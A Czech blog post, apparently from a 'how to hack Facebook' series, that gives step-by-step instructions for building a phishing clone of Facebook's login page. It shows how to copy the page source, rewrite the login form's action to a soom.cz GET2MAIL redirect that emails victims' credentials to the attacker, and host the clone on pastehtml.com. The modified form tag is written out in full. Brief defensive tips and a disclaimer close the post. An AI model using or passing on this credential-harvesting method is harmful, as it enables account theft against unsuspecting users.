Další cizí slovo, který nejspíš většině z Vás nic neřekne. Phishing vychází z anglické slova fishing což  znamená rybaření, myšleno v kontextu jako “návnada” a počáteční písmeno f je nahrazeno ph, což má trošku hlubší význam, pokud Vás to zajímá mrkněte na wikipedia.cz. Abych to uzavřel, přeložil bych Phishing trošku nadnešeně jako – “návnady pro lamy” 🙂 . Ajťáci pochopí, laická veřejnost asi bude dumat proč, jsem použil slovo lamy. Ale to by bylo na další vysvětlování.

Co to tedy přesně dělá a jak mi to pomůže hacknou někomu účet? Phishing je podvodná technika používaná na Internetu k získávání citlivých údajů,  nejčastěji se jedná o zadání osobních údajů na falešnou stránku, která na první pohled není k rozeznání od skutečné stránky. V podstatě uživatel, takto věnuje své citlivá data aniž by měl ponětí, že právě naletěl podvodníkům.

Takže náš úkol bude vytvořit totožnou kopii Facebook úvodní příhlašovací stránky, kterou tak všichni dobře známe. Následovně zařídit, aby jsme obdrželi takto získané údaje na svůj email. První krok, přejděte na stránka facebook.com, klikněte pravým tlačítkem myši kamkoliv na stránku, z menu vyberte Zobrazit zdrojkový kód stránky ( Google Chrome ) , Zobrazit zdrojový kód ( IE 9 ) , Zobrazit zdrojový kód stránky ( Firefox ) . Použijte kombinaci kláves CTRL + A označit vše, CTRL + C kopírovat.  Otevřete si nyní např. notepad nebo word a vložte CTRL + V . Nyní jděte na stránku soom.cz , proveďte registraci na stránkách  a následovně z pravého menu vyberte GET2MAIL a klikněte na možnost Registrovat nové id . Vygeneruje se Vám ID, které zhruba bude vypadat nějak následovně 02184f4679 . Klikněte na něj a zaškrtněte možnost – Zasílat data e-mailem (vas@email.cz)  Nyní se vraťte zpět ke zdrojovému kódu stránky a v kódu najděte spojení:

<form id=”POST” action=” https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

a nahraďte

<form id=”POST” action=” http://www.soom.cz/projects/get2mail/redir.php?id= 02184f4679&url=https://www.facebook.com/login.php?login_attempt=1″ method=”post” onsubmit=”return Event.__inlineSubmit(this,event)”>

za červený text dosaďte Vaše ID, které jste si vygenerovali na stránkách soom.cz. Nyní celý text opět označte CTRL + A a kopírujte CTRL + C . Otevřete si stránku pastehtml.com , nakopírujte změněný zdrojový kód Facebooku. Klikněte na modré tlačítko Publish page a opět vpravo nahoře na Publish page. Objeví se Vám stránka s linkem, tento link si zkopírujte a vložte do prohlížeče. Tadááá výsledek je na světě, mrkněte jak by zhruba měl vypadat >> SEM  << . Nyní stačí jen, když Vám někdo na této stránce vyplní přihlášení na svůj profil a Vám tak automaticky přijdou tyto informace na email.

  • Je to skutečně tak vážný?

Ano, jedná se o celkem vážný případ, kdy méně znalý uživatel může naletět na takto podvodně vytvořené stránky. Neboť i když se stránka nachází na jiné doméně, mnozí nepozorní uživatelé si toho nevšimnou a to nemluvím, že není větší problém, stránku nechat otevírat ve framu aniž by byla adresa stránky vůbec vidět ! Mimo to,  uživatel zadá svoje přihlašovací údaje a následovně mu naskočí pravá facebook stránka!  Uživatel se  tak domnívá, že pouze špatně vyplnil heslo, neboť ho facebook vyžaduje znova ! Ve skutečnosti, však právě jeho heslo odešlo někomu do mejl boxu a on se poprvé skutečně hlásí do svého FB profilu.

  • Jak se mám bránit?

Jediným řešením je neklikat na různé tlačítka líbí se mi, neklikat na odkazy odkazující na facebook z jiných stránek. Vždy se přihlašujte na svůj Facebook profil pouze přes doménu www.facebook.com ! Jakmile zpozorujete cokoliv jiného, rychle ze stránek vycouvejte! Kontrolujte adresu stránky ve Vašem prohlížeči, případně když najedete myší na jakýkoliv odkaz, většinou se v prohlížeči vlevo dole, při najetí na odkaz zobrazí skutečná adresa stránky, na kterou budete odkázáni.

Zpět na hlavní článek >> Jak hacknout facebook ?

Pokračovat na >> Keylogger , Kontrolní otázkaFaceNiff, Phishing, Hack s pomocí přátel

_________________________________________________________________________________

Tento článek není návodem k páchání trestné činnosti, pouze jsem na něm ukázal, jak zranitelné jsou každodenní webové služby bez použití SSL a jak málo stačí při Vaší nepozornosti k tomu, aby jste vyzradili Vaše přístupové údaje někomu cizímu.